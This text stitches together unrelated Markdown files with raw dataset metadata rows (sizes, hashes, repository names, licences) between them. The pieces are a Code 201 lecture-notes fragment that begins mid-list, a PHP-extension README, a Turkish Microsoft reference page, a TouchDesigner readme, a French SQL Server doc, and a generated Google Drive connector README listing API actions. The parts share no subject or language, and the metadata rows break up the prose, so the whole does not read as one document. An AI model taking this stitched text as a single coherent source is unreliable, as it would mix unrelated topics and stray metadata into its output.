- Keep in mind that you have unlimited re-takes on the quizzes, and also that the quizzes are designed to be treated like they are open-book. It's more about what you can figure out than what you have memorized.
- Also, note that the quizzes have two main purposes:
1. To get you to re-engage with the content in a different way, reinforcing your knowledge.
1. To help you prepare for the Code 301 entrance exam, which you will take at the end of Week 3. There is a minimum threshold you must pass on that exam (80%), and also, that exam factors into your grade in this class.
- **Lab 05c** will be published at the end of class. It is a tutorial on working with CSS selectors, and will be due at the time the other Lab 05 assignments are due. It is being published early to give you flexibility and extra time to complete these tutorials.
- Learning journals: Starting today, there is a daily Learning Journal assignment in Canvas. The purpose of this assignment is to reflect on what you have learned today. These assignments are due before the following class.
- There will be lots of detail work today on JS and CSS. We're going forward with the expectation that you will need minimal instruction on HTML except for concepts and overview of practices, and the specifics of how to interface with JS and CSS.
- **Be sure to raise questions** about any topics that you'd like clarity about. If it is a topic that we will cover in the future, we'll let you know and maybe give a quick answer for now. On this day in particular, when we have so much to cover, it is important to avoid going down time-consuming rabbit-holes.
## Learning Objectives
As a result of completing Lecture 2 of Code 201, students will:
- Demonstrate understanding of the fundamental structures of HTML, including `<DOCTYPE>`, `<head>`, `<title>`, `<body>`, and `<script>`, as measured by successful completion of the daily code assignment and a quiz administered in Canvas
- Demonstrate understanding of and make use of assorted data types such as booleans, strings, integers, floats in JavaScript, as measured by successful completion of the daily code assignment and a quiz administered in Canvas
- Demonstrate understanding of and make use of introductory CSS concepts and techniques from Chapter 10 of the textbook, as measured by successful completion of the daily code assignment and a quiz administered in Canvas
- Be able to successfully manage a code project in the command line by doing pushes and pulls to/from a repository on GitHub.
## Git command basics
- `git status`
- Provides a detailed description of current state in working directory
- `git add <file/s>`
- Move one or more files from your working directory into staged status
- `git commit -m "Your commit message"`
- Snapshot the staged changes in current working directory, with a brief message describing the changes
- `git push <destination> <branch>`
- Push local commits to GitHub
## Live code
In our code demo today we'll do the following:
- Create a GitHub repo for our weekly project and `git clone` it
- Read through the lab assignment, translate it into a to-do list, and fulfill some technical components such as:
1. Create a basic scaffold for a code project
1. Utilize `if/else` statements to handle conditional logic
1. Add in some basic input validation
1. Utilize good Git processes including **a-c-p** cycles
## CSS Cheatsheet
- [css everything cheatsheet](https://overapi.com/css){:target="_blank"}
| 64.483871 | 312 | 0.766133 | eng_Latn | 0.999615 |
97a795fba5d474118e0ae4bad8b86688725850b8 | 233 | md | Markdown | README.md | wangming1993/php-extension | 783f07e010ffeed5f0f3f584c687afbd1fe666ca | [
"MIT"
] | null | null | null | README.md | wangming1993/php-extension | 783f07e010ffeed5f0f3f584c687afbd1fe666ca | [
"MIT"
] | null | null | null | README.md | wangming1993/php-extension | 783f07e010ffeed5f0f3f584c687afbd1fe666ca | [
"MIT"
] | null | null | null | # PHP extension development
> This is a testing project for php extension development
## References
> - http://php.net/manual/zh/internals2.ze1.zendapi.php
## License
```
The MIT License (MIT)
Copyright (c) 2016 Mike Wang
```
| 13.705882 | 57 | 0.712446 | eng_Latn | 0.692322 |
97a7e797e7e29b7afdc6f45328130f8318aa9c42 | 1,577 | md | Markdown | docs/framework/additional-apis/microsoft.sqlserver.server.smiorderproperty.item.md | yunuskorkmaz/docs.tr-tr | e73dea6e171ca23e56c399c55e586a61d5814601 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/additional-apis/microsoft.sqlserver.server.smiorderproperty.item.md | yunuskorkmaz/docs.tr-tr | e73dea6e171ca23e56c399c55e586a61d5814601 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/additional-apis/microsoft.sqlserver.server.smiorderproperty.item.md | yunuskorkmaz/docs.tr-tr | e73dea6e171ca23e56c399c55e586a61d5814601 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
description: 'Daha fazla bilgi edinin: Smorderproperty. Item özelliği'
title: Smorderproperty. Item Özelliği (Microsoft. SqlServer. Server)
author: stevestein
ms.author: sstein
ms.date: 12/20/2018
ms.technology: dotnet-data
topic_type:
- apiref
api_name:
- Microsoft.SqlServer.Server.SmiOrderProperty.Item
- Microsoft.SqlServer.Server.SmiOrderProperty.get_Item
api_location:
- System.Data.dll
api_type:
- Assembly
ms.openlocfilehash: fc2151d3f36a6746e80e2fd6d611a803b2c3162e
ms.sourcegitcommit: ddf7edb67715a5b9a45e3dd44536dabc153c1de0
ms.translationtype: MT
ms.contentlocale: tr-TR
ms.lasthandoff: 02/06/2021
ms.locfileid: "99767992"
---
# <a name="smiorderpropertyitem-property"></a>Smorderproperty. Item özelliği
Varlığın sütun sırasını alır. Bu özelliği içeren derlemenin SQLAccess.dll bir arkadaş ilişkisi vardır. SQL Server tarafından kullanılmak üzere tasarlanmıştır. Diğer veritabanları için, bu veritabanı tarafından sunulan barındırma mekanizmasını kullanın.
## <a name="syntax"></a>Syntax
```csharp
internal SmiColumnOrder Item { get; }
```
## <a name="property-value"></a>Özellik değeri
Sütun sırası.
## <a name="remarks"></a>Açıklamalar
> [!WARNING]
> `SmiOrderProperty.Item`Özelliği Dahili ve doğrudan kodunuzda kullanılmamalıdır.
>
> Microsoft, bu özelliğin herhangi bir koşulda bir üretim uygulamasında kullanımını desteklemez.
## <a name="requirements"></a>Gereksinimler
**Ad alanı:**<xref:Microsoft.SqlServer.Server>
**Bütünleştirilmiş kod:** System. Data (System.Data.dll)
**.NET Framework sürümleri:** 2,0 sürümünden itibaren kullanılabilir.
| 30.326923 | 252 | 0.792644 | tur_Latn | 0.978599 |
This work is not my own, and is here only to provide access to shared techniques posted on the TouchDesigner forum.
DeferredShading.toe - posted by malcolm http://www.derivative.ca/Forum/viewtopic.php?f=20&t=658&hilit=deferred+render#p1870
deferredTests.2.toe - posted by archo-p http://www.derivative.ca/Forum/viewtopic.php?f=20&t=658&hilit=deferred+render#p30163
Reference networks from the TouchDesigner forum thread:
http://www.derivative.ca/Forum/viewtopic.php?f=20&t=658&hilit=deferred+render
---
title: Mining Structure Tasks and How-tos | Microsoft Docs
ms.custom: ''
ms.date: 06/13/2017
ms.prod: sql-server-2014
ms.reviewer: ''
ms.technology: analysis-services
ms.topic: conceptual
helpviewer_keywords:
- mining structures [Analysis Services], how-to topics
ms.assetid: 085962c2-b50b-4a3b-8176-a0b920e2593a
author: minewiskan
ms.author: owend
ms.openlocfilehash: 2441723198d6fee9c9108e4547d7bc338184bb03
ms.sourcegitcommit: ad4d92dce894592a259721a1571b1d8736abacdb
ms.translationtype: MT
ms.contentlocale: fr-FR
ms.lasthandoff: 08/04/2020
ms.locfileid: "87612596"
---
# <a name="mining-structure-tasks-and-how-tos"></a>Tâches de la structure d'exploration de données et procédures
L'onglet **Structure d'exploration de données** du Concepteur d'exploration de données de [!INCLUDE[ssBIDevStudioFull](../../includes/ssbidevstudiofull-md.md)] contient des outils qui permettent de créer, de modifier et de traiter une structure d'exploration de données.
## <a name="in-this-section"></a>Dans cette section
- [créer une structure d'exploration de données relationnelle](create-a-new-relational-mining-structure.md)
- [Créer une structure d’exploration de données OLAP](create-a-new-olap-mining-structure.md)
- [ajouter des colonnes à une structure d'exploration de données](add-columns-to-a-mining-structure.md)
- [Supprimer des colonnes d'une structure d'exploration de données](remove-columns-from-a-mining-structure.md)
- [ajouter une table imbriquée à une structure d'exploration de données](add-a-nested-table-to-a-mining-structure.md)
- [Modifier les propriétés d'une structure d'exploration de données](change-the-properties-of-a-mining-structure.md)
- [Modifier la vue de source de données utilisée pour une structure d'exploration de données](edit-the-data-source-view-used-for-a-mining-structure.md)
- [traiter une structure d'exploration de données](process-a-mining-structure.md)
- [Filtrer le cube source d'une structure d'exploration de données](../filter-the-source-cube-for-a-mining-structure.md)
#  Drive **flow**ground Connector
## Description
A generated **flow**ground connector for the Drive API (version v3).
Generated from: https://api.apis.guru/v2/specs/googleapis.com/drive/v3/swagger.json<br/>
Generated at: 2019-05-23T12:13:21+03:00
## API Description
Manages files in Drive including uploading, downloading, searching, detecting changes, and updating sharing permissions.
## Authorization
Supported authorization schemes:
- OAuth2
For OAuth 2.0 you need to specify OAuth Client credentials as environment variables in the connector repository:
* `OAUTH_CLIENT_ID` - your OAuth client id
* `OAUTH_CLIENT_SECRET` - your OAuth client secret
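For local testing you might, for example, put placeholder values in a `.env` file (assuming your runtime loads one; on the flowground platform the variables are configured on the connector repository itself):

```
OAUTH_CLIENT_ID=1234567890-example.apps.googleusercontent.com
OAUTH_CLIENT_SECRET=your-client-secret
```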
## Actions
### Gets information about the user, the user's Drive, and system capabilities.
*Tags:* `about`
#### Input Parameters
* `alt` - _optional_ - Data format for the response.
Possible values: json.
* `fields` - _optional_ - Selector specifying which fields to include in a partial response.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Lists the changes for a user or Team Drive.
*Tags:* `changes`
#### Input Parameters
* `includeCorpusRemovals` - _optional_ - Whether changes should include the file resource if the file is still accessible by the user at the time of the request, even when a file was removed from the list of changes and there will be no further change entries for this file.
* `includeRemoved` - _optional_ - Whether to include changes indicating that items have been removed from the list of changes, for example by deletion or loss of access.
* `includeTeamDriveItems` - _optional_ - Whether Team Drive files or changes should be included in results.
* `pageSize` - _optional_ - The maximum number of changes to return per page.
* `pageToken` - _required_ - The token for continuing a previous list request on the next page. This should be set to the value of 'nextPageToken' from the previous response or to the response from the getStartPageToken method.
* `restrictToMyDrive` - _optional_ - Whether to restrict the results to changes inside the My Drive hierarchy. This omits changes to files such as those in the Application Data folder or shared files which have not been added to My Drive.
* `spaces` - _optional_ - A comma-separated list of spaces to query within the user corpus. Supported values are 'drive', 'appDataFolder' and 'photos'.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `teamDriveId` - _optional_ - The Team Drive from which changes will be returned. If specified the change IDs will be reflective of the Team Drive; use the combined Team Drive ID and change ID as an identifier.
### Gets the starting pageToken for listing future changes.
*Tags:* `changes`
#### Input Parameters
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `teamDriveId` - _optional_ - The ID of the Team Drive for which the starting pageToken for listing future changes from that Team Drive will be returned.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
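To illustrate how this action works together with the changes listing above, here is a rough sketch of the polling pattern against the underlying Drive v3 REST endpoints. This is not the connector's own invocation format, and `accessToken` is a placeholder for an OAuth 2.0 token you have already obtained:

```javascript
// Fetch a starting token once, then page through later changes with it.
async function pollChanges(accessToken) {
  const headers = { Authorization: `Bearer ${accessToken}` };

  // 1. Get the token that marks "now".
  const start = await fetch(
    'https://www.googleapis.com/drive/v3/changes/startPageToken',
    { headers }
  ).then((res) => res.json());

  // 2. Later, list everything that changed since that token.
  let pageToken = start.startPageToken;
  while (pageToken) {
    const page = await fetch(
      `https://www.googleapis.com/drive/v3/changes?pageToken=${pageToken}`,
      { headers }
    ).then((res) => res.json());

    for (const change of page.changes) {
      console.log(change.fileId, change.removed);
    }

    // newStartPageToken only appears on the last page; keep it for the next poll.
    if (page.newStartPageToken) return page.newStartPageToken;
    pageToken = page.nextPageToken;
  }
}
```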
### Subscribes to changes for a user.
*Tags:* `changes`
#### Input Parameters
* `includeCorpusRemovals` - _optional_ - Whether changes should include the file resource if the file is still accessible by the user at the time of the request, even when a file was removed from the list of changes and there will be no further change entries for this file.
* `includeRemoved` - _optional_ - Whether to include changes indicating that items have been removed from the list of changes, for example by deletion or loss of access.
* `includeTeamDriveItems` - _optional_ - Whether Team Drive files or changes should be included in results.
* `pageSize` - _optional_ - The maximum number of changes to return per page.
* `pageToken` - _required_ - The token for continuing a previous list request on the next page. This should be set to the value of 'nextPageToken' from the previous response or to the response from the getStartPageToken method.
* `restrictToMyDrive` - _optional_ - Whether to restrict the results to changes inside the My Drive hierarchy. This omits changes to files such as those in the Application Data folder or shared files which have not been added to My Drive.
* `spaces` - _optional_ - A comma-separated list of spaces to query within the user corpus. Supported values are 'drive', 'appDataFolder' and 'photos'.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `teamDriveId` - _optional_ - The Team Drive from which changes will be returned. If specified the change IDs will be reflective of the Team Drive; use the combined Team Drive ID and change ID as an identifier.
### Stop watching resources through this channel
*Tags:* `channels`
#### Input Parameters
* `alt` - _optional_ - Data format for the response.
Possible values: json.
* `fields` - _optional_ - Selector specifying which fields to include in a partial response.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Lists or searches files.
*Tags:* `files`
#### Input Parameters
* `corpora` - _optional_ - Comma-separated list of bodies of items (files/documents) to which the query applies. Supported bodies are 'user', 'domain', 'teamDrive' and 'allTeamDrives'. 'allTeamDrives' must be combined with 'user'; all other values must be used in isolation. Prefer 'user' or 'teamDrive' to 'allTeamDrives' for efficiency.
* `corpus` - _optional_ - The source of files to list. Deprecated: use 'corpora' instead.
Possible values: domain, user.
* `includeTeamDriveItems` - _optional_ - Whether Team Drive items should be included in results.
* `orderBy` - _optional_ - A comma-separated list of sort keys. Valid keys are 'createdTime', 'folder', 'modifiedByMeTime', 'modifiedTime', 'name', 'name_natural', 'quotaBytesUsed', 'recency', 'sharedWithMeTime', 'starred', and 'viewedByMeTime'. Each key sorts ascending by default, but may be reversed with the 'desc' modifier. Example usage: ?orderBy=folder,modifiedTime desc,name. Please note that there is a current limitation for users with approximately one million files in which the requested sort order is ignored.
* `pageSize` - _optional_ - The maximum number of files to return per page. Partial or empty result pages are possible even before the end of the files list has been reached.
* `pageToken` - _optional_ - The token for continuing a previous list request on the next page. This should be set to the value of 'nextPageToken' from the previous response.
* `q` - _optional_ - A query for filtering the file results. See the "Search for Files" guide for supported syntax.
* `spaces` - _optional_ - A comma-separated list of spaces to query within the corpus. Supported values are 'drive', 'appDataFolder' and 'photos'.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `teamDriveId` - _optional_ - ID of Team Drive to search.
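As an illustration of the `q` parameter's syntax, here is a rough sketch of the equivalent raw Drive v3 request that this action wraps (`ACCESS_TOKEN` is a placeholder, and the query values are made up):

```javascript
const params = new URLSearchParams({
  q: "mimeType = 'application/pdf' and name contains 'report'",
  orderBy: 'modifiedTime desc',
  pageSize: '10',
});

fetch(`https://www.googleapis.com/drive/v3/files?${params}`, {
  headers: { Authorization: `Bearer ${process.env.ACCESS_TOKEN}` },
})
  .then((res) => res.json())
  .then((body) => body.files.forEach((f) => console.log(f.id, f.name)))
  .catch(console.error);
```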
### Creates a new file.
*Tags:* `files`
#### Input Parameters
* `ignoreDefaultVisibility` - _optional_ - Whether to ignore the domain's default visibility settings for the created file. Domain administrators can choose to make all uploaded files visible to the domain by default; this parameter bypasses that behavior for the request. Permissions are still inherited from parent folders.
* `keepRevisionForever` - _optional_ - Whether to set the 'keepForever' field in the new head revision. This is only applicable to files with binary content in Drive.
* `ocrLanguage` - _optional_ - A language hint for OCR processing during image import (ISO 639-1 code).
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `useContentAsIndexableText` - _optional_ - Whether to use the uploaded content as indexable text.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Generates a set of file IDs which can be provided in create requests.
*Tags:* `files`
#### Input Parameters
* `count` - _optional_ - The number of IDs to return.
* `space` - _optional_ - The space in which the IDs can be used to create new files. Supported values are 'drive' and 'appDataFolder'.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Permanently deletes all of the user's trashed files.
*Tags:* `files`
#### Input Parameters
* `alt` - _optional_ - Data format for the response.
Possible values: json.
* `fields` - _optional_ - Selector specifying which fields to include in a partial response.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Permanently deletes a file owned by the user without moving it to the trash. If the file belongs to a Team Drive the user must be an organizer on the parent. If the target is a folder, all descendants owned by the user are also deleted.
*Tags:* `files`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Gets a file's metadata or content by ID.
*Tags:* `files`
#### Input Parameters
* `acknowledgeAbuse` - _optional_ - Whether the user is acknowledging the risk of downloading known malware or other abusive files. This is only applicable when alt=media.
* `fileId` - _required_ - The ID of the file.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Updates a file's metadata and/or content with patch semantics.
*Tags:* `files`
#### Input Parameters
* `addParents` - _optional_ - A comma-separated list of parent IDs to add.
* `fileId` - _required_ - The ID of the file.
* `keepRevisionForever` - _optional_ - Whether to set the 'keepForever' field in the new head revision. This is only applicable to files with binary content in Drive.
* `ocrLanguage` - _optional_ - A language hint for OCR processing during image import (ISO 639-1 code).
* `removeParents` - _optional_ - A comma-separated list of parent IDs to remove.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `useContentAsIndexableText` - _optional_ - Whether to use the uploaded content as indexable text.
### Lists a file's comments.
*Tags:* `comments`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `includeDeleted` - _optional_ - Whether to include deleted comments. Deleted comments will not include their original content.
* `pageSize` - _optional_ - The maximum number of comments to return per page.
* `pageToken` - _optional_ - The token for continuing a previous list request on the next page. This should be set to the value of 'nextPageToken' from the previous response.
* `startModifiedTime` - _optional_ - The minimum value of 'modifiedTime' for the result comments (RFC 3339 date-time).
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Creates a new comment on a file.
*Tags:* `comments`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `fields` - _optional_ - Selector specifying which fields to include in a partial response.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Deletes a comment.
*Tags:* `comments`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Gets a comment by ID.
*Tags:* `comments`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `includeDeleted` - _optional_ - Whether to return deleted comments. Deleted comments will not include their original content.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Updates a comment with patch semantics.
*Tags:* `comments`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Lists a comment's replies.
*Tags:* `replies`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `includeDeleted` - _optional_ - Whether to include deleted replies. Deleted replies will not include their original content.
* `pageSize` - _optional_ - The maximum number of replies to return per page.
* `pageToken` - _optional_ - The token for continuing a previous list request on the next page. This should be set to the value of 'nextPageToken' from the previous response.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Creates a new reply to a comment.
*Tags:* `replies`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Deletes a reply.
*Tags:* `replies`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `replyId` - _required_ - The ID of the reply.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Gets a reply by ID.
*Tags:* `replies`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `includeDeleted` - _optional_ - Whether to return deleted replies. Deleted replies will not include their original content.
* `replyId` - _required_ - The ID of the reply.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Updates a reply with patch semantics.
*Tags:* `replies`
#### Input Parameters
* `commentId` - _required_ - The ID of the comment.
* `fileId` - _required_ - The ID of the file.
* `replyId` - _required_ - The ID of the reply.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Creates a copy of a file and applies any requested updates with patch semantics.
*Tags:* `files`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `ignoreDefaultVisibility` - _optional_ - Whether to ignore the domain's default visibility settings for the created file. Domain administrators can choose to make all uploaded files visible to the domain by default; this parameter bypasses that behavior for the request. Permissions are still inherited from parent folders.
* `keepRevisionForever` - _optional_ - Whether to set the 'keepForever' field in the new head revision. This is only applicable to files with binary content in Drive.
* `ocrLanguage` - _optional_ - A language hint for OCR processing during image import (ISO 639-1 code).
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Exports a Google Doc to the requested MIME type and returns the exported content. Please note that the exported content is limited to 10MB.
*Tags:* `files`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `mimeType` - _required_ - The MIME type of the format requested for this export.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
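For example, exporting a Google Doc as a PDF against the raw endpoint could look like the sketch below (`YOUR_FILE_ID` and the token are placeholders; `application/pdf` is one of the export MIME types Drive supports for Docs):

```javascript
const fs = require('fs');

const fileId = 'YOUR_FILE_ID'; // placeholder
const mimeType = encodeURIComponent('application/pdf');

fetch(`https://www.googleapis.com/drive/v3/files/${fileId}/export?mimeType=${mimeType}`, {
  headers: { Authorization: `Bearer ${process.env.ACCESS_TOKEN}` },
})
  .then((res) => res.arrayBuffer())
  .then((buf) => fs.writeFileSync('export.pdf', Buffer.from(buf)))
  .catch(console.error);
```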
### Lists a file's or Team Drive's permissions.
*Tags:* `permissions`
#### Input Parameters
* `fileId` - _required_ - The ID of the file or Team Drive.
* `pageSize` - _optional_ - The maximum number of permissions to return per page. When not set for files in a Team Drive, at most 100 results will be returned. When not set for files that are not in a Team Drive, the entire list will be returned.
* `pageToken` - _optional_ - The token for continuing a previous list request on the next page. This should be set to the value of 'nextPageToken' from the previous response.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then the requester will be granted access if they are an administrator of the domain to which the item belongs.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Creates a permission for a file or Team Drive.
*Tags:* `permissions`
#### Input Parameters
* `emailMessage` - _optional_ - A plain text custom message to include in the notification email.
* `fileId` - _required_ - The ID of the file or Team Drive.
* `sendNotificationEmail` - _optional_ - Whether to send a notification email when sharing to users or groups. This defaults to true for users and groups, and is not allowed for other requests. It must not be disabled for ownership transfers.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `transferOwnership` - _optional_ - Whether to transfer ownership to the specified user and downgrade the current owner to a writer. This parameter is required as an acknowledgement of the side effect.
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then the requester will be granted access if they are an administrator of the domain to which the item belongs.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
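As a sketch of the request this action forwards, sharing a file with a single user as a reader against the raw endpoint might look like this (the file ID and email address are placeholders):

```javascript
const fileId = 'YOUR_FILE_ID'; // placeholder

fetch(`https://www.googleapis.com/drive/v3/files/${fileId}/permissions?sendNotificationEmail=true`, {
  method: 'POST',
  headers: {
    Authorization: `Bearer ${process.env.ACCESS_TOKEN}`,
    'Content-Type': 'application/json',
  },
  // role/type/emailAddress are the core fields of a Drive v3 permission resource.
  body: JSON.stringify({ role: 'reader', type: 'user', emailAddress: '[email protected]' }),
})
  .then((res) => res.json())
  .then((permission) => console.log('created permission', permission.id))
  .catch(console.error);
```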
### Deletes a permission.
*Tags:* `permissions`
#### Input Parameters
* `fileId` - _required_ - The ID of the file or Team Drive.
* `permissionId` - _required_ - The ID of the permission.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then the requester will be granted access if they are an administrator of the domain to which the item belongs.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Gets a permission by ID.
*Tags:* `permissions`
#### Input Parameters
* `fileId` - _required_ - The ID of the file.
* `permissionId` - _required_ - The ID of the permission.
* `supportsTeamDrives` - _optional_ - Whether the requesting application supports Team Drives.
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then the requester will be granted access if they are an administrator of the domain to which the item belongs.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Updates a permission with patch semantics.
*Tags:* `permissions`
#### Input Parameters
* `fileId` - _required_ - The ID of the file or Team Drive.
* `permissionId` - _required_ - The ID of the permission.
* `removeExpiration` - _optional_ - Whether to remove the expiration date.
